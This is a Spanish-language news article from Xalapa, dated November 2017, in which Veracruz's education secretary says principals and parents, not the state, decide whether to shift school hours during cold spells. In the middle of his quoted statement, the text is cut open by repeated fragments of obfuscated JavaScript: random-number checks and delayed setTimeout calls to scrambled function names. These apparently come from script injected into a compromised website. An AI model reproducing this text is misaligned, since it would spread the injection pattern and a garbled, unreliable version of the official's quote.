Horario invernal en escuelas, una decisión de maestros y padres de familia: SEV

20 noviembre, 2017

Yhadira Paredes. Xalapa. Los directivos de las escuelas en coordinación con los padres de familias, serán quienes deberán tomar la decisión de modificar el horario de entrada y salida de clases en aquellos municipios donde se registrarán bajas temperaturas, informó el titular de la Secretaría de Educación de Veracruz (SEV), Enrique Pérez Rodríguez.

Entrevistado en el marco del Desfile Cívico-Deportivo por el 107 Aniversario del inicio de la Revolución Mexicana, el titular de la SEV descartó que se vaya a dar una disposición generalizada de cambio de horarios ante la llegada de la temporada invernal.

“Este evento de los frentes fríos que nos lleva a que en determinadas partes del estado se complique el clima por las bajas temperatura y afecta a los alumnos. Privilegiandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o la salud de los alumnos, los maestros, junto con los padres de familia la libertad de ajustar el horario de entrada de los alumnos”.

Explicó que no todos los municipios donde se ubican las más de 23 mil escuelas es necesario, están sujetos a ajustes, de acuerdo a como lo van previendo.

Insistió en que no se pueda dar una directriz general, porque el clima es impredecible.

Asimismo, Enrique Pérez, manifestó que los directores de las escuelas que opten por modificar el cambio de entrada de las instituciones, tendrán que notificar a las supervisiones escolares y ellos a su vez a oficinas centrales de la SEV.

“Procuramos no tomar decisiones generalizadas, porque las afectaciones no lo son”, finalizó.